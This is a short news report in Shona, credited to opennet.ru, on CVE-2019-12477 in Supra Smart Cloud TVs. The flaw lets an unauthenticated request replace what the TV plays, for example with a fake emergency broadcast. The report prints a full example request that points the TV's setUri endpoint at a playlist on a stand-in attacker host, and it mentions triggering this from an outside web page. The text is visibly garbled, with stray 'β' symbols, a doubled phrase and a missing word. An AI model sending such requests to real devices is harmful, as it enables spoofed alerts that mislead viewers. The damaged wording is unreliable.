PaSupra Smart Cloud TVs vulnerability (CVE-2019-12477) iyo inokutendera kuti utsive chirongwa chiri kutariswa nezviri mukati meanorwisa. Semuenzaniso, kuburitsa kwenyevero yekunyepedzera nezvemamiriro ekukurumidzira kunoratidzwa.
Kurwiswa, zvakakwana kutumira yakanyatsogadzirwa network chikumbiro chisingade kuvimbiswa. Kunyanya, unokwanisa kuwana β/remote/media_control?action=setUri&uri=β mubatisi nekudoma URL yefaira rem3u8 rine mavhidhiyo paramita, semuenzaniso βhttp://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8."
Muzviitiko zvakawanda, kuwana kero yeTV yeTV kunogumira kunetiweki yemukati, asi sezvo chikumbiro ichitumirwa kuburikidza neHTTP, zvinokwanisika kushandisa nzira dzekuwana zviwanikwa zvemukati kana mushandisi avhura peji rakagadzirirwa rekunze (semuenzaniso, pasi chimiro chekukumbira mufananidzo kana kushandisa iyo ).
Source: opennet.ru